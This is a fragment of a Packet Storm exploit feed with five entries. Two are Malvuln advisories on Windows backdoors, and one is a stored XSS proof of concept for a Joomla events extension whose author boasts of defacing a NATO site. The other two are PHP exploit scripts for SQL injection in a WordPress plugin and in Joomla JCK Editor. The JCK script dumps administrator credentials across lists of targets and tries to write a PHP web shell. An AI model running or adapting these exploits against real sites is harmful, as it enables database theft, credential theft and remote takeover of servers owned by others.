"packetstorm", "title": "Backdoor.Win32.Antilam.14.o Code Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161676", "href": "https://packetstormsecurity.com/files/161676/Backdoor.Win32.Antilam.14.o-Code-Execution.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 \nOriginal source: https://malvuln.com/advisory/3f3ee9dce39e816b4001bd6ae66e8f1a.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Antilam.14.o \nVulnerability: Unauthenticated Remote Command Execution \nDescription: The malware listens on TCP ports 47891 and 29559. Third party attackers who can reach infected systems can execute commands made available by the backdoor. Netcat utility worked the best for running commands, which are supplied as numeric values or hex characters. The values sent correspond to different commands mapped in the backdoor. Example, to get the date/time we can enter 015 or the hex value 0xF. \nType: PE32 \nMD5: 3f3ee9dce39e816b4001bd6ae66e8f1a \nVuln ID: MVID-2021-0121 \nDropped files: scandisk.exe \nDisclosure: 03/06/2021 \n \nExploit/PoC: \nnc64.exe x.x.x.x 47891 \n \n001 + Enter (Gets system info) \n \n001\u2567\u03b1\u2229\u03a9\u03b1 Windows: C:\\WINDOWS \n\u2567\u03b1\u2229\u03a9\u03b1 System: \n\u2567\u03b1\u2229\u03a9\u03b1 Temp: C:\\Users\\victim\\AppData\\Local\\Temp\\ \n\u252c\u03c3\u2261\u00b1\u03a6Windows: Windows NT 6.2 9200 \n\u2560\u03a6\u03c6\u2264\u2265 \u0393 Windows: 15 \n\u255a\u221e\u03a9\u03b5\u221e\u2229\u03b1: DESKTOP-3A2IQHO \n\u255a\u221e\u25a0\u03c4\u03c3\u2261\u03b1: victim \n\u2580\u03c4\u221a\u03a9 Windows: English (United States) \n\u2568\u03b1\u03c4\u2261\u03c3\u00b0\u03c3\u03c6\u03a6\u03c3: 1554x840 \nNumLock: Off \nCapsLock: \nScrollLock: Off \n\u2261\u03b5\u03a6\u03c0\u2261\u221a\u0393\u03b1\u03c6\u03a6\u03c3 \u03c4\u0393\u2264\u03a9\u03b1: \u2500\u03b1 \n\u2564\u0393\u03b5\u00df\u03b5\u03a3\u03c6\u03b5\u03c3 \u221e\u03c3\u00b1\u2265\u03b5 \u03c6\u03b1 \u03a3\u03a6\u00b1\u03a9\u03c3: 2,554,454,016 \n\u2552\u03b5\u00b1\u2265: DESKTOP-3A2IQHO \n\u2569\u03b4\u03a6\u03c3\u03c6\u2265\u03b5\u0393 \u2229\u03b5\u03a3\u03a9\u03b4\u25a0\u2248\u03c3\u03c6\u03b5: 7 \n \nOther commands: \n \n004 TaskBar \n007 Monitor \n008 Ctrl+Alt+Del \n009 ScrollLock \n010 or 0xA (HEX) CapsLock \n011 NumLock \n012 CD-ROM \n015 or 0xF(HEX) Get Date/Time \n018 Mouse has been unlocked \n022 Shell Experience HostCommand Prompt Promptrator) \n029 lists current dir malware is running from \n033 (logout the remote system) \n082 exit netcat session \n111 lists file C:\\Users\\victim\\AppData\\Local\\Temp\\scrsm.src \n115 starts packman animation that eats the screen \n116 stops packman animation \n120 Web browser \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161676/MVID-2021-0121.txt"}, {"lastseen": "2021-03-08T16:23:21", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Backdoor.Win32.Agent.bjev Insecure Permissions", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161685", "href": "https://packetstormsecurity.com/files/161685/Backdoor.Win32.Agent.bjev-Insecure-Permissions.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 \nOriginal source: https://malvuln.com/advisory/35cf54a19efcdeaa41899647075c7ef9.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Agent.bjev \nVulnerability: Insecure Permissions \nDescription: Agent.bjev creates an insecure dir named \"Windupdt\" under c:\\ drive, granting change permissions (C) to the authenticated user group. Standard users can rename the malware to disable it or replace with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. \nType: PE32 \nMD5: 35cf54a19efcdeaa41899647075c7ef9 \nVuln ID: MVID-2021-0123 \nDropped files: winupdate.exe \nDisclosure: 03/06/2021 \n \nExploit/PoC: \nC:\\>cacls \\Windupdt \nC:\\Windupdt BUILTIN\\Administrators:(OI)(CI)(ID)F \nNT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F \nBUILTIN\\Users:(OI)(CI)(ID)R \nNT AUTHORITY\\Authenticated Users:(ID)C \nNT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C \n \nC:\\Windupdt>dir /a \nVolume in drive C has no label. \n \nDirectory of C:\\Windupdt \n \n06/17/2012 12:16 AM 974,848 winupdate.exe \n1 File(s) 974,848 bytes \n \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161685/MVID-2021-0123.txt"}, {"lastseen": "2021-03-08T16:21:52", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Joomla Matukio Events 7.0.5 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161682", "href": "https://packetstormsecurity.com/files/161682/Joomla-Matukio-Events-7.0.5-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title:Joomla Matukio Events 7.0.5 Stored XSS \n# Date:08.03.2021 \n# Author: Vincent666 ibn Winnie \n# Software Link: https://matukio.compojoom.com/ \n# Tested on: Windows 10 \n# Web Browser: Mozilla Firefox \n# My Youtube Channel : https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ \n# Google Dorks: inurl:option=com_matukio \n \n \nPoC: \n \nI found simple , but interesting stored xss in Matukio Events. \n \nhttps://matukio.compojoom.com/events/event/81-science/979-rocket-science \n \nPress \"Book Now\": \n \nField \"Comments\" vulnerable to XSS and html code injection. \n \nPut xss code and save this. It's works with different codes. \n \nThe code I like for the test: \n \nhttps://pastebin.com/4V9sS7V3 \n \n \nVideo: \n \nhttps://youtu.be/HlTEcDqNxSM \n \nExample on another site events.sto.nato.int \n \nhttps://www.youtube.com/watch?v=pBY2UskIuNU \n \n \n \nHost: matukio.compojoom.com \n \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) \nGecko/20100101 Firefox/86.0 \n \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \n \nAccept-Language: en-US;q=0.5,en;q=0.3 \n \nAccept-Encoding: gzip, deflate, br \n \nContent-Type: multipart/form-data; \nboundary=---------------------------9492328303638924271813324098 \n \nContent-Length: 2816 \n \nOrigin: https://matukio.compojoom.com \n \nConnection: keep-alive \n \nReferer: https://matukio.compojoom.com/events/book/979-rocket-science \n \nCookie: d9122e5739e92113272e5173db43cd67=72qdv1oufsi2avknr7614genno; \n_ga=GA1.2.90714308.1615201744; _gid=GA1.2.178258541.1615201744 \n \nUpgrade-Insecure-Requests: 1 \n \nnrbooked=1&coupon_code=&field[3]=Mr&field[4]=&field[5]=azsxc&field[6]=ASD&field[8]=azsxc&field[9]=112233&field[10]=Zasx&field[11]=algeria&field[13]=vsdv@dklelw.de&field[14]=&field[15]=&field[16]=&field[17]=<style>body{visibility:hidden;}html{background: \nurl(https://img5.goodfon.ru/wallpaper/nbig/6/5d/kholst-kraska-mazki-abstraktsiia-canvas-paint-brush-strokes.jpg) \nround;}</style><script>alert(\"Test \nXSS\")</script>&agb=Yes&revoke=Yes&uuid=&task=book.book&semid=979&formId=1&61c98812f3351c5686829fce5947bf84=1 \n \n(p.s.: \nI don't publicly test the Joomla extensions anymore, but this time I \nposted it publicly because I did xss art on the NATO site in this \ncomponent.) \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161682/joomlamatukioevents705-xss.txt"}, {"lastseen": "2021-03-08T16:21:47", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "WordPress SuperStoreFinder / SuperInteractiveMaps 6.3 SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161689", "href": "https://packetstormsecurity.com/files/161689/WordPress-SuperStoreFinder-SuperInteractiveMaps-6.3-SQL-Injection.html", "sourceData": "`<?php \n#Title : SuperStoreFinder & SuperInteractiveMaps Wordpress Plugin SQL Injection \n#Researcher : Eagle Eye \n#Exploit Name : SSF & SIM SQL Injection \n#Request type : POST \n#Plugin Author : Joe lz \n#Plugin Website : https://superstorefinder.net/ \n#Version Affected : All version (include latest 6.3) \n#Date : 07/03/2021 \n#Tested on : Google Chrome,FireFox, Window 10 64bit \n#Vuln parameter = ssf_wp_id \n#Vuln ssf path : /wp-content/plugins/superstorefinder-wp/ssf-social-action.php \n#Vuln sim path : /wp-content/plugins/super-interactive-maps/sim-wp-data.php \nfunction filtration($input) \n{ \n$dis = '/\"/i'; \n$item = preg_replace($dis,\"\",$input); \necho $item; \n} \nfunction http_request($target,$toPost) \n{ \n$ch = curl_init(); \ncurl_setopt($ch,CURLOPT_HEADER,0); \ncurl_setopt($ch,CURLOPT_RETURNTRANSFER,1); \ncurl_setopt($ch,CURLOPT_URL,$target); \ncurl_setopt($ch,CURLOPT_POST,1); \ncurl_setopt($ch,CURLOPT_POSTFIELDS,$toPost); \n$data = curl_exec($ch); \n \nif(curl_errno($ch)) \n{ \nprint curl_error($ch); \n} \nelse \n{ \necho $data; \n} \ncurl_close($ch); \n} \n \nif(isset($_POST['inject'])) \n{ \nswitch($_POST['plugin']) \n{ \ncase 'ssf': \n$toPost = \"action=\".$_POST['action'].\"&ssf_wp_id=\".$_POST['id']; \n$target = $_POST['target']. \n\"/wp-content/plugins/superstorefinder-wp/ssf-social-action.php\"; \nhttp_request($target,$toPost); \nbreak; \ncase 'sim': \n$toPost = \"id=\".$_POST['id']; \n$target = $_POST['target']. \n\"/wp-content/plugins/super-interactive-maps/sim-wp-data.php\"; \nhttp_request($target,$toPost); \nbreak; \n} \n} \n?> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161689/wpssfsim63-sql.txt"}, {"lastseen": "2021-03-08T16:21:32", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Joomla JCK Editor 6.4.4 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17254"], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161683", "href": "https://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html", "sourceData": "`# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2) \n# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/ \n# Date: 05/03/2021 \n# Exploit Author: Nicholas Ferreira \n# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor \n# Version: 6.4.4 \n# Tested on: Debian 10 \n# CVE : CVE-2018-17254 \n# PHP version (exploit): 7.3.27 \n# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa \n \n<?php \n \n$vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php'; \n \nfunction payload($str1, $str2=\"\"){ \nreturn '?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #\" \n} \n \n \nfunction get_request($url){ \n$ch = curl_init(); \ncurl_setopt($ch, CURLOPT_URL, $url); \ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); \ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); \n#curl_setopt($ch, CURLOPT_PROXY, \"127.0.0.1:8080\"); \n$output = curl_exec($ch); \ncurl_close($ch); \nreturn $output; \n} \n \nfunction parse_columns($columns){ \n$parsed_columns = array(); \nforeach($columns as $col){ \narray_push($parsed_columns, $col); \narray_push($parsed_columns, \"0x242324\"); //delimiter = $#$ \n} \nreturn $parsed_columns; \n} \n \nfunction inject($url, $payload){ \nglobal $vuln_file; \n$request = get_request($url.$vuln_file.$payload); \npreg_match_all('/url =\"(.*)\">/', $request, $output); \nreturn $output; \n} \n###### \n \nfunction is_vulnerable($url){ \nglobal $vuln_file; \n$output = inject($url, payload(\"0x6861636b6564\")); \nif(isset($output[1][0])){ \nif(base64_encode($output[1][0]) == \"aGFja2Vk\"){ //checking if we can inject \nreturn 1; \n} \n} \nreturn 0; \n} \n \nfunction get_db_names($url){ \nglobal $vuln_file; \n$db_names = array(); \n$output = inject($url, payload(\"schema_name\", \"%20from%20information_schema.schemata\")); \nforeach($output[1] as $db){ \narray_push($db_names, $db); \n} \nreturn $db_names; \n} \n \nfunction get_table_names($url, $db){ \nglobal $vuln_file; \n$table_names = array(); \n$output = inject($url, payload(\"table_name\", \"%20from%20information_schema.tables%20WHERE%20table_schema=%27\".$db.\"%27\")); \nforeach($output as $table){ \narray_push($table_names, $table); \n} \nreturn $table_names; \n} \n \nfunction get_column_names($url, $table){ \nglobal $vuln_file; \n$column_names = array(); \n$output = inject($url, payload(\"column_name\", \"%20from%20information_schema.columns%20WHERE%20table_name=%27\".$table.\"%27\")); \nforeach($output as $column){ \narray_push($column_names, $column); \n} \nreturn $column_names; \n} \n \nfunction dump_columns($url, $columns, $dbname, $table){ \nglobal $vuln_file; \n$column_dump = array(); \n$related_arr = array(); \n$data = array(); \n$output = inject($url, payload(\"concat(\".implode(',', parse_columns($columns)).\")\", \"%20from%20\".$dbname.\".\".$table)); \nforeach($output[1] as $column){ \n$exploded = explode(\"$#$\", $column); \narray_push($data, $exploded); \n} \nforeach($data as $user_info){ \narray_pop($user_info); \narray_push($related_arr, array_combine($columns, $user_info)); \n} \nreturn $related_arr; \n} \n \nfunction rce($url){ //probably won't work =( \nglobal $vuln_file; \nif(!is_vulnerable($url)){ \ndie(red(\"[-] Target isn't vulnerable.\")); \n} \n$server_root = array(\"/var/www/\", \"/var/www/html/\", \"/usr/local/apache2/htdocs/\", \"/var/www/nginx-default/\", \"/srv/www/\", \"/usr/local/apache2/htdocs/\"); \n$rand_content = \"AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2\"; \n$payl0ad = \"'<?php system(\\$_GET[0]); ?> \".$rand_content.\"'\"; \n$filename = rand(1000, 7359).\".php\"; \necho cyan(\"[i]\").\" Trying to upload a RCE shell...\\n\"; \nforeach($server_root as $path){ \ninject($url, payload($payl0ad, \" INTO OUTFILE '\".$path.$filename.\"'\")); \n} \n$get_shell = get_request($url.\"/\".$filename); \nif(strpos($get_shell, $rand_content) !== false){ \necho green(\"[+] RCE shell successfully uploaded! =)\\n\"); \ndie(\"Usage: \".$url.\"/\".$filename.\"?0=whoami\\n\"); \n}else{ \necho(red(\"[-] \").\"Could not upload RCE shell. Maybe stacked queries are not supported. =(\\n\"); \ndie(cyan(\"[i] \").\"But you can still inject SQL commands! What about dumping the users table? =)\\n\"); \n} \n} \n \nfunction read_file($url, $file){ \nglobal $vuln_file; \n} \n \n############ \n \nfunction green($str){ \nreturn \"\\e[92m\".$str.\"\\e[0m\"; \n} \nfunction red($str){ \nreturn \"\\e[91m\".$str.\"\\e[0m\"; \n} \nfunction yellow($str){ \nreturn \"\\e[93m\".$str.\"\\e[0m\"; \n} \nfunction cyan($str){ \nreturn \"\\e[96m\".$str.\"\\e[0m\"; \n} \n \nfunction banner(){ \necho \" \n___ _____ _ __ _____ \n|_ |/ __ \\| | / /| _ \\ \n| || / \\/| |/ / | | | | _ _ _ __ ___ _ __ ___ _ _ \n| || | | \\ | | | || | | || '_ ` _ \\ | '_ \\ / _ \\| '__| \n/\\__/ /| \\__/\\| |\\ \\| |/ / | |_| || | | | | || |_) || __/| | \n\\____/ \\____/\\_| \\_/|___/ \\__,_||_| |_| |_|| .__/ \\___||_| \n\".green(\"Coder: \").yellow(\"Nicholas Ferreira\").\" | | \n|_| \n \n\"; \n} \n$target = 0; \n$rce = 0; \nfunction check(){ \nglobal $argv; \nglobal $argc; \nglobal $target; \nglobal $rce; \nglobal $target_list; \nglobal $save_output; \nglobal $verbose; \nglobal $less; \nglobal $specified_db; \n$short_args = \"u:t:v::h::l::r::d::\"; \n$long_args = array(\"url:\",\"targets::\",\"verbose::\",\"help::\",\"less::\",\"rce::\", \"db::\"); \n$options = getopt($short_args, $long_args); \n \nif(isset($options['h']) || $argc == 1 || isset($options['help'])){ \necho \"JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254) \n \nUsage: php \".$argv[0].\" -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db] \n \n-u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/) \n-h, --help: Help \n-v, --verbose: Verbose mode (print tables) \n-l, --less: Less outputs (only Administrator usernames and passwords) \n-t, --targets: Load a list of targets \n-r, --rce: Try to upload a RCE shell \n-d, --db: Specifies the DB to dump \n \n\"; \n \n} \n \nif(isset($options['u'])){ \n$target = $options['u']; \n}elseif(isset($options['url'])){ \n$target = $options['url']; \n}else{ \n$target = \"\"; \n} \n \nisset($options['v']) || isset($options['verbose']) ? $verbose = 1 : $verbose = 0; \nisset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0; \nisset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0; \nisset($options['f']) ? $target_list = $options['f'] : $target_list = 0; \n \nif(isset($options['t'])){ \n$target_list = $options['t']; \n}elseif(isset($options['targets'])){ \n$target_list = $options['targets']; \n}else{ \n$target_list = 0; \n} \n \nif(isset($options['d'])){ \n$specified_db = $options['d']; \n}elseif(isset($options['db'])){ \n$specified_db = $options['db']; \n}else{ \n$specified_db = 0; \n} \n \n \nif(strlen($target_list) < 2){ \nif($target !== \"\"){ // check if URL is ok \nif(!preg_match('/^((https?:\\/\\/)|(www\\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\\/.*)?$/', $target)){ \ndie(red(\"[i] The target must be a URL.\\n\")); \n} \nif(strpos($target, \"plugins\") == false){ \ndie(red(\"[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\\n\")); \n} \n}else{ \ndie(cyan(\"[-] \").\"You can get help with -h.\\n\"); \n} \n} \n \nif($target_list !== 0){ //check if target list is readable \nif(!file_exists($target_list)){ \ndie(red(\"[-] \").\"Could not read target list file.\\n\"); \n} \n} \n} \n \n \n \nfunction exploit($url){ // returns users and passwords \nglobal $vuln_file; \nglobal $verbose; \nglobal $rce; \nglobal $specified_db; \nglobal $less; \necho cyan(\"\\n=========================| \".str_replace(\"plugins\", \"\", $url).\" |=========================\\n\\n\\n\"); \necho cyan(\"[+] \").\"Checking if target is vulnerable...\\n\"; \nif (is_vulnerable($url)){ \n$main_db = inject($url, payload(\"database()\"))[1]; \n$user_table = \"\"; \n$hostname = inject($url, payload(\"@@hostname\"))[1]; \n$mysql_user = inject($url, payload(\"user()\"))[1]; \n$mysql_version = inject($url, payload(\"@@version\"))[1]; \n$connection_id = inject($url, payload(\"connection_id()\"))[1]; \n \necho green(\"[+] Target is vulnerable! =)\\n\\n\"); \necho cyan(\"[i] \").\"Hostname: \".yellow($hostname[0]).\"\\n\"; \necho cyan(\"[i] \").\"Current database: \".yellow($main_db[0]).\"\\n\"; \necho cyan(\"[i] \").\"MySQL version: \".yellow($mysql_version[0]).\"\\n\"; \necho cyan(\"[i] \").\"MySQL user: \".yellow($mysql_user[0]).\"\\n\"; \necho cyan(\"[i] \").\"Connection ID: \".yellow($connection_id[0]).\"\\n\\n\"; \n \nif($rce){ \nrce($url); \n} \n \n \necho cyan(\"[+] \").\"Getting DB names...\\n\"; \n$dbs = get_db_names($url); \nif(count($dbs) == 0){ \necho(\"[-] There are no DBs available on this target. =(\\n\"); \n} \n \n$db_list = array(); \nforeach($dbs as $db){ \n$num_table = count(get_table_names($url, $db)[1]); \necho green(\"[+] DB found: \").cyan($db.\" [\".$num_table.\" tables]\").\"\\n\"; \narray_push($db_list, $db); \n} \nif($main_db == \"\" && !$specified_db){ \necho(red(\"[-] Could not find Joomla! default DB. Try to dump another DB with -d. \\n\")); \n} \nif($specified_db !== 0){ // if user doesn't specify a custom db \necho cyan(\"\\n[+] \").\"Getting tables from \".yellow($specified_db).\"...\\n\"; \n$tables = get_table_names($url, $specified_db); \n}else{ \nforeach($db_list as $new_db){ \nif($new_db !== \"test\" && strlen(strpos($new_db, \"information_schema\") !== false) == 0){ // neither test nor i_schema \necho cyan(\"\\n[+] \").\"Getting tables from \".yellow($new_db).\"...\\n\"; \n$tables = get_table_names($url, $new_db); \n} \n} \n} \necho cyan(\"[+] \").yellow(count($tables[1])).\" tables found! \\n\"; \nif(count($tables[1]) == 0){ \necho(red(\"[-] \".\"Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \\n\")); \n} \n \nforeach($tables[1] as $table){ \nif($verbose) echo $table.\"\\n\"; \nif(strpos($table, \"_users\") !== false){ \n$user_table = $table; \n} \n} \n \nif($user_table == \"\"){ \necho(red(\"[-] Could not find Joomla default users table. Try to find it manually!\\n\")); \n} \n \necho cyan(\"[+] \").\"Getting columns from \".yellow($user_table).\"...\\n\"; \n$columns = get_column_names($url, $user_table); \n \nif(count($columns) == 0){ \necho(red(\"[-] There are no columns on this table... =(\\n\")); \n} \nif($verbose){ \necho cyan(\"[+] \").\"Columns found:\\n\"; \nforeach($columns[1] as $coll){ \necho $coll.\"\\n\"; \n} \n} \necho cyan(\"[+] \").\"Dumping usernames from \".yellow($user_table).\"...\\n\"; \n \n$dump = dump_columns($url, array(\"id\",\"usertype\", \"name\",\"username\",\"password\",\"email\",\"lastvisitDate\"), $db, $user_table); \n \nif(is_array($dump) && count($dump) == 0){ \n$new_dump = dump_columns($url, array(\"id\",\"name\",\"username\",\"password\",\"email\",\"lastvisitDate\"), $db, $user_table); \nif(count($new_dump) == 0){ \necho(red(\"[-] This table is empty! =(\\n\")); \n}else{ \n$dump = $new_dump; \n$usertype = 0; \n} \n}else{ \n$usertype = 1; \n} \necho cyan(\"\\n[+] \").\"Retrieved data:\\n\"; \nforeach($dump as $user){ \nif($usertype){ \n$adm = strpos($user['usertype'], 'Administrator') !== false; \n}else{ \n$adm = false; \n} \nif($less){ \nif(strpos($user['usertype'], \"Administrator\") !== false){ \necho \"\\n=============== \".green($user['username']).\" ===============\\n\"; \nforeach($user as $key => $data){ \nif(strlen($data) > 0){ \nif($key == \"username\" || $key == \"password\" || $adm){ \necho($key.\": \".red($data).\"\\n\"); \n}else{ \necho($key.\": \".$data.\"\\n\"); \n} \n} \n} \n} \n \n}else{ \necho \"\\n=============== \".green($user['username']).\" ===============\\n\"; \nforeach($user as $key => $data){ \nif(strlen($data) > 0){ \nif($key == \"username\" || $key == \"password\" || $adm){ \necho($key.\": \".red($data).\"\\n\"); \n}else{ \necho($key.\": \".$data.\"\\n\"); \n} \n} \n} \n} \n \n} \n \necho(green(\"\\nExploit completed! =)\\n\\n\\n\")); \n \n}else{ \necho(red(\"[-] Apparently, the provided target is not vulnerable. =(\\n\\n\")); \necho(cyan(\"[i] \").\"This may be a connectivity issue. If you're persistent, you can try again.\\n\"); \n} \n} \n \n \nbanner(); \ncheck(); \n \nif(strlen($target_list) >1){ \n$targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline \nforeach($targets as $website){ \nif($rce){ \nrce($target); \n}else{ \nif(strlen($website) > 1){ \nexploit($website); //multiple targets \n} \n} \n} \n}else{ \nexploit($target); //single target \n} \n \n?> \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/161683/joomlajckeditor644parent-sql.txt"}]}